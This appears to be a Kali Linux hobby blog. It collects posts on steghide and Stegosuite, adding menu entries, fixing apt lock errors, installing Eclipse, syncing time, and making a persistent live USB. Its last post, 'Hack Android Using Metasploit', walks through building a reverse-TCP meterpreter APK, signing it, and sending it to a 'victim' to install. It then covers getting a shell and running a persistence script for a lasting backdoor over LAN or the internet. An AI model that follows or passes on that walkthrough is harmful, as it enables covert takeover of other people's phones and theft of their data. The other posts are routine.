Saturday, 17 March 2018

Use Steghide & StegoSuite

Steganography is one of the oldest techniques for hiding data: data in an image, an image inside another image, or data in a video or audio file.
You can easily hide any kind of video, audio, text, message or image inside another. For example, when a sender wants to transfer some secret information from one place to another, steganography is the best method for secret transmission.
Many steganography tools are available in Kali Linux, but Steghide and StegoSuite are the two most popular.

Steghide – Installation and Usage

Steghide is a command-line tool that lets you hide data in various kinds of image and audio files without losing any quality of the original file; in other words, steghide is a fully embedding-resistant program.
Steghide supports JPEG/JPG, BMP, WAV and AU files. You can also extract the data with steghide.
To install Steghide in Kali Linux, type:
Command: apt-get install steghide

To use this tool, type “steghide” in your terminal.


We have created a secret.txt file with some data and placed a kevinmitnick.jpg file in the same directory, so we are going to hide the secret.txt file in the kevinmitnick.jpg file.




Command: steghide embed -cf kevinmitnick.jpg -ef secret.txt

This command asks for a password, which you set so that no one else can extract the secret data from your file.
It then embeds the secret.txt data in the image file kevinmitnick.jpg.
To extract the data from this file, type the command below.
Command: steghide extract -sf kevinmitnick.jpg

The receiver also has to use the same steghide tool to recover the data. If the password is correct, the contents of the original file are extracted from the image file and saved in the current directory.
You can also view information about the embedded data by typing the command below.
Command: steghide info kevinmitnick.jpg

Stegosuite – Installation and Usage

Stegosuite is a fully graphical (GUI) tool. Its functionality is the same as steghide's; the only difference is the graphical interface.
Stegosuite is also available in the Kali Linux repository, so you can install it by typing the following command.
Command: apt-get install stegosuite

Once the above command completes, type “stegosuite” in the same terminal, or open Stegosuite from the Applications menu at the top.



Now click on the File menu and embed the text. You can also embed any file (txt) using the 2nd textbox, and in the 3rd section you can set a passphrase so that the file remains confidential.



In the same way, you can also extract the confidential data from any image.

Alacarte - Add Software To The Main Menu

You might want to know how to customize your main Applications menu, so here it is.
1. Install the alacarte tool:
apt-get install alacarte
2. Now Start Alacarte using command:
alacarte

The Main Menu dialog shows you the list of the first-rank menu items. In this example, we are going to put Firefox Quantum into the menu structure, so do the following:
3. Go to the location and click on New Item (In this example I am in [Usual Applications/Internet]).

4. Put in the name and full path to the tool.
5. Optionally, add a comment that will show as a Tool-Tip when you mouse over the tool.
6. Click on the Upper-Left Corner of the dialog to Add or Change the icon for the tool.

7. Click the Ok Button.

“Unable to lock the administration directory (/var/lib/dpkg/)” [Fix]

While using the apt-get command or the relatively new APT package management tool in Kali Linux (which I actually use as my primary operating system for doing daily work), you might have encountered the error – “unable to lock the administration directory (/var/lib/dpkg/) is another process using it” on the command line.
This error can be very annoying, especially for new Linux (Ubuntu) users who may not know its exact cause.
Below is an example, showing the lock file error in Ubuntu 16.10:
kali@root:~$ sudo apt install neofetch
[sudo] password for tecmint:
E: Could not get lock /var/lib/dpkg/lock - open (11: Resource temporarily unavailable)
E: Unable to lock the administration directory (/var/lib/dpkg), is another process using it?
The output below is another possible instance of the same error:
E: Could not get lock /var/lib/apt/lists/lock - open (11: Resource temporarily unavailable)
E: Unable to lock directory /var/lib/apt/lists/ 
E: Could not get lock /var/lib/dpkg/lock - open (11: Resource temporarily unavailable) 
E: Unable to lock the administration directory (/var/lib/dpkg/), is another process using it?
How can you solve the above error if you run into it in the future? There are several ways of dealing with it, but in this guide we will go through the two easiest and probably most effective ones.

1. Find and Kill all apt-get or apt Processes

Run the command below to list all processes whose name contains the word apt. Using ps and grep together in a pipeline gives you a list that includes all apt and apt-get processes.
$ ps -A | grep apt
Kill each apt-get or apt process that you can see in the output of the command above, using the command below.
The process ID (PID) is found in the first column of that output.
$ sudo kill -9 processnumber
OR
$ sudo kill -SIGKILL processnumber
For instance, the command below, where 9 is the signal number for the SIGKILL signal, will kill the first apt process:
$ sudo kill -9 13431
OR
$ sudo kill -SIGKILL 13431

2. Delete the lock Files

A lock file simply prevents access to another file (or files) or some data on your Linux system. This concept is present in Windows and other operating systems as well.
Once you run an apt-get or apt command, a lock file is created under any of these directories: /var/lib/apt/lists/, /var/lib/dpkg/ and /var/cache/apt/archives/.
This helps to avoid the apt-get or apt process that is already running from being interrupted by either a user or other system processes that would need to work with files being used by apt-get or apt. When the process has finished executing, the lock file is then deleted.
Important: If a lock still exists in the two directories above with no noticeable apt-get or apt process running, this may mean the process was held up for one reason or another, so you need to delete the lock files in order to clear the error.
First execute the command below to remove the lock file in the /var/lib/dpkg/ directory:
$ sudo rm /var/lib/dpkg/lock
Afterwards force package(s) to reconfigure like so:
$ sudo dpkg --configure -a
Alternatively, delete the lock files in the /var/lib/apt/lists/ and cache directory as below:
$ sudo rm /var/lib/apt/lists/lock
$ sudo rm /var/cache/apt/archives/lock
Next, update your packages sources list as follows:
$ sudo apt update
OR
$ sudo apt-get update
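
The "no noticeable apt-get or apt process running" condition can be checked directly instead of being inferred from ps and grep. The following script is an added example, not part of the original post: it walks /proc to list the processes that still have each of the three lock files open, and it deletes nothing. The function names are made up for this example.

```shell
#!/bin/sh
# Added example: before deleting an apt/dpkg lock file, list the processes
# that still have it open. Uses Linux /proc; function names are hypothetical.

# lock_holders FILE: print the PID of each process holding FILE open.
lock_holders() {
    target=$(readlink -f -- "$1") || return 2
    for fd in /proc/[0-9]*/fd/*; do
        # unreadable or vanished entries make readlink fail; skip them
        link=$(readlink -- "$fd" 2>/dev/null) || continue
        if [ "$link" = "$target" ]; then
            pid=${fd#/proc/}
            echo "${pid%%/*}"
        fi
    done | sort -un
}

# safe_to_remove FILE: succeed only when no process has FILE open.
safe_to_remove() {
    [ -z "$(lock_holders "$1")" ]
}

# Report on the three lock files named in the post; delete nothing.
check_apt_locks() {
    for lock in /var/lib/dpkg/lock /var/lib/apt/lists/lock \
                /var/cache/apt/archives/lock; do
        [ -e "$lock" ] || continue
        if safe_to_remove "$lock"; then
            echo "$lock: no process has it open"
        else
            for p in $(lock_holders "$lock"); do
                # name the holder, so you can wait for it to finish instead
                echo "$lock: held by PID $p ($(cat "/proc/$p/comm" 2>/dev/null))"
            done
        fi
    done
}

check_apt_locks   # run as root to see processes owned by other users
```

If a holder is listed, it is usually an update or install that is still running; letting it finish avoids interrupting dpkg in the middle of a package operation.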
In conclusion, we have walked through two important methods to deal with a common problem faced by Ubuntu (and its derivatives) users, while running apt-get or apt as well as aptitude commands.

Install & Configure Eclipse IDE

1. First Download The Package from the Eclipse website for the Linux Version.




2. Open Your Kali Linux OS and Open Terminal and Locate the Download directory.

cd Downloads



3. Now unpack the downloaded file and store it in the tmp location.
There are two ways to unpack the file: manually, by right-clicking on the archive and extracting it, or through a command. I am going to show the command here.

tar xvzf <package_name>.tar.gz -C /tmp/

Note: It's not necessary to keep the files in the tmp location, but it is the recommended way.



4. Now switch to the superuser. I am actually logged in as the superuser, i.e. root. It's easy: just type su and then enter your password, and you will be switched to the superuser.

5. Now change the file owner and group and move the folder to opt directory.

chown -R root:root /tmp/eclipse && mv /tmp/eclipse /opt/

6. Now create a symlink so that you don't need to type a long command to open Eclipse.

ln -s /opt/eclipse/eclipse /usr/local/bin/eclipse

Now we are done. Just Type 

eclipse


Sunday, 18 February 2018

Date & Time Issue [Fix]



Install ntpdate and run it against your country's NTP pool server. It will solve the problem.


Code:
$ sudo apt-get install ntpdate
$ sudo ntpdate in.pool.ntp.org

Friday, 28 April 2017

Kali Linux Live With Persistence

First, you'll need a program to install Kali on your USB drive and make it bootable. My program of choice is Universal USB Installer, as it's painfully easy to use and it has direct links to the download pages of many Linux distros within the program.


Search for this button, and get the program. Once you run it, you'll see a disclaimer page. Accept it (or read it first, if you feel like it), and you'll be presented with the configuration section (after a few seconds). Choose Kali from the dropdown menu:


Once you have downloaded your Kali image, select it:


And then choose the drive letter for your USB drive (you probably won't need to use that checkbox on the right side). Be careful when doing this.


I'd recommend checking the box that formats your USB drive. That will wipe your whole USB drive, so make sure you back up everything you had there before proceeding. It performs a quick format, so there's no reason to avoid this.


Click on Create, then Yes, and it'll do the whole process by itself. The longest part will be extracting the ISO to your USB, but it'll be over in a matter of minutes.


If everything went as expected, you'll see this, and you have a USB drive you can live boot your Kali from.


Setting Up Persistence
Do you like live booting from USB, but want to save changes made to your OS, or just files (such as .pcap files), to your USB drive? You'll need to set up persistence. Your USB drive must have 8 GB+ of storage space.
Download Mini Tool Partition Wizard Free, install it, run it and then choose Launch Application.
Right click on your USB drive, and click on Move/Resize

Use the small black arrow keys to shrink the partition size. It will leave a bit of storage space free, but if you manually assign the Partition Size, the program may fail. Click OK.



A new big grey chunk of unallocated space has appeared! Right click on it and click on Create. It'll warn us that Windows won't be able to see that partition, but we don't care about that ;)


Pick these options:
· Create as: Primary
· File System: Ext4
· Partition Label: persistence
Then click OK.

Now click on Apply (upper left corner), and just wait for it to complete the tasks.

Setting Up The Persistence

Once the partition manager has finished, reboot your computer and boot up from your USB drive. Choose the option "Live USB Persistence", and when it's booted up, open a Terminal and use these commands:
Determine which partition of your drive you'll use

fdisk -l

Remember your drive had a FAT32 partition and an Ext4 (Linux) one?

Make a directory on the filesystem to mount your USB

mkdir -p /mnt/my_usb

Mount the partition on the directory you made (don't click the desktop icon labeled persistence!)

mount /dev/sdc2 /mnt/my_usb

Add a configuration file to enable persistence

echo "/ union" > /mnt/my_usb/persistence.conf

Unmount the partition and reboot

umount /dev/sdc2 && reboot

Now, if you boot up to Live USB Persistence, you'll be able to save stuff everywhere on your Linux filesystem, and every configuration you make locally will be available everywhere you plug it in :)
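
The device name /dev/sdc2 used in the steps above depends on how many disks the machine has, and writing persistence.conf to the wrong partition is easy to do. The following script is an added example, not part of the original post: it selects the partition by the label and filesystem chosen in the partition manager (persistence, ext4) and refuses to guess when there is no match or more than one. The function names and the sample blkid lines are constructed for this example.

```shell
#!/bin/sh
# Added example: pick the persistence partition by label and filesystem
# type instead of assuming /dev/sdc2. Function names are hypothetical.

# pick_persistence: read `blkid` output on stdin; print the one device with
# LABEL="persistence" and TYPE="ext4". Exit 1 if none match, 2 if several do.
pick_persistence() {
    awk '
        /(^| )LABEL="persistence"( |$)/ && /(^| )TYPE="ext4"( |$)/ {
            dev = $1; sub(/:$/, "", dev); found[++n] = dev
        }
        END {
            if (n == 1) { print found[1]; exit 0 }
            exit (n == 0 ? 1 : 2)
        }'
}

# enable_persistence: the mount / persistence.conf / umount steps from the
# post, run against the device pick_persistence selected. Needs root.
enable_persistence() {
    dev=$(blkid | pick_persistence) || {
        echo "no unique ext4 partition labelled persistence" >&2
        return 1
    }
    mkdir -p /mnt/my_usb &&
    mount "$dev" /mnt/my_usb &&
    echo "/ union" > /mnt/my_usb/persistence.conf &&
    umount /mnt/my_usb
}

# Constructed sample of blkid output, so the selection can be tried offline.
sample_blkid() {
    cat <<'EOF'
/dev/sda1: UUID="0f3c9a52-0000-4000-8000-000000000001" TYPE="ext4"
/dev/sdc1: LABEL="KALI LIVE" UUID="1A2B-3C4D" TYPE="vfat"
/dev/sdc2: LABEL="persistence" UUID="0f3c9a52-0000-4000-8000-000000000002" TYPE="ext4"
/dev/sdd1: PARTLABEL="persistence" UUID="5E6F-7A8B" TYPE="vfat"
EOF
}

sample_blkid | pick_persistence   # prints /dev/sdc2
```

On the live system, call enable_persistence as root and then reboot.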

Wednesday, 15 February 2017

Hack Android Using Metasploit

1. Open a terminal.
2. You can do this by typing:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Port to Listen>
R > /root/Desktop/<anything>.apk (replace LHOST with your own IP)

Note: You can also hack Android over WAN, i.e. through the Internet, by using your public/external IP in LHOST and by port forwarding.

3. Now we must generate a keystore and sign our APK, because some devices and some versions of Android require the app to be signed.
4. For Generating the Keystore:


keytool -genkey -v -keystore /root/Desktop/my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000



5. Enter a six-digit password and remember it.
6. Fill in all the details and answer Yes to the last question. The keystore will be created. You will be asked for the password again.




7. Now we have to sign the apk file using this Keystore. To do this type:

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore2 my_application.apk alias_name

When it asks for the passphrase, enter the password you entered earlier.





8. Load metasploit console, by typing:

msfconsole





9. After it loads (it will take time), load the multi-handler exploit by typing : 


use exploit/multi/handler


10. Set up a (reverse) payload by typing: 

set payload android/meterpreter/reverse_tcp


11. To set L host type : 

set LHOST <Your IP>

Note: Even if you are hacking on WAN, type your private/internal IP here, not the public/external one.



12. At last type: exploit to start the listener.





13. Copy the application that you made (Anything.apk) from the root folder, 
to your android phone.
14. Then send the apk file to the phone you want to hack.
15. Let the Victim install the app.
Note: However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
16. And when he clicks Open, there comes the meterpreter prompt.




17. Download Persistent.sh
18. Upload the file to the device in /sdcard/Downloads.

19. cd /  (To go to the Root Directory)

19. Then navigate to the /sdcard/Download/ using cd

20. To upload the file use command:

upload /root/Desktop/Persistent.sh
(For these Images anything.sh is actually Persistent.sh)


21. Now, all we must do is execute the script once, and then everything will be done by the script automatically.
22. Drop into the system's shell by typing:

shell

23. Now, navigate to the location of the script:
cd /
cd /sdcard/Download
ls

24. Now it's time for EXECUTION. Type:

sh Persistent.sh


Things To Remember:

The persistence of the backdoor will only remain until a reboot of the android system.
If you are hacking on WAN and you have a dynamic Public IP, then, the persistence will only remain until your router reboots/your IP changes.

Remember to reboot the Android device to eliminate the running script if you are testing on your own Android system.
If the Victim's Android system is Rooted and your Public IP is Static, then:

1)The Persistence will remain forever on WAN!
2)The Persistence will remain forever on LAN Obviously.
